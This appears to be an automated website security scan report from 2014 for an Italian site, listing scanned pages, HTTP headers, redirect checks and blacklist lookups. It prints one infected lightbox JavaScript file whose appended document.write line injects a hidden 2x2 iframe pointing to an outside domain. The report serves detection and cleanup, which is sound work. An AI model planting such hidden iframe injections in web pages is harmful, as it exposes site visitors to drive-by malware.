Scanned pages/files
Request | Server response | Status |
http://walternudo.it/ | HTTP/1.1 200 OK Connection: close Date: Sun, 05 Oct 2014 00:24:55 GMT Accept-Ranges: bytes Server: Apache Content-Language: it Content-Length: 1536 Content-Type: text/html Last-Modified: Tue, 24 Sep 2013 15:59:14 GMT | clean |
http://www.walternudo.it/home | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 00:24:55 GMT Location: http://www.walternudo.it/home/ Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.walternudo.it/home/ | 200 OK Content-Length: 27733 Content-Type: text/html | clean |
http://www.walternudo.it/home/mambots/content/bot_mb/js/popbox.js | 200 OK Content-Length: 11508 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/mambots/content/bot_mb/js/moviebox.js | 200 OK Content-Length: 11093 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/templates/yt_firefly/lib/js/reflection/reflection.js | 200 OK Content-Length: 2852 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/templates/yt_firefly/lib/js/lightbox/slimbox.js | 200 OK Content-Length: 7198 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/templates/yt_firefly/lib/js/yt_tools.js | 200 OK Content-Length: 5071 Content-Type: application/javascript | clean |
http://www.walternudo.it/home/mambots/content/plugin_jw_sig/slimbox.js | 200 OK Content-Length: 7467 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var Lightbox = { init: function(options) { this.options = Object.extend({ resizeDuration: 400, initialWidth: 250, initialHeight: 250, animateCaption: true }, options || {}); this.anchors = []; $A(document.getElementsByTagName('a')).each(function(el){ if(el.rel && el.href && el.rel.test('^lightbox', 'i')) { el.onclick = this.click.pass(el, this); this.anchors.push(el); } }, this) } for(var f in this.fx) this.fx[f].clearTimer(); this.center.style.display = this.bottom.style.display = 'none'; this.fx.overlay.chain(this.setup.pass(false, this)).goTo(0); return false; } }; Window.onDomReady(Lightbox.init.bind(Lightbox));
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=205149></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=205149 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=205149>
http://walternudo.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: walternudo.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 00:24:55 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: it
Content-Length: 1536
Content-Type: text/html
Last-Modified: Tue, 24 Sep 2013 15:59:14 GMT
...1536 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: walternudo.it
Referer: http://www.google.com/search?q=walternudo.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=walternudo.it
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://walternudo.it/
Result: walternudo.it is not infected or malware details are not published yet.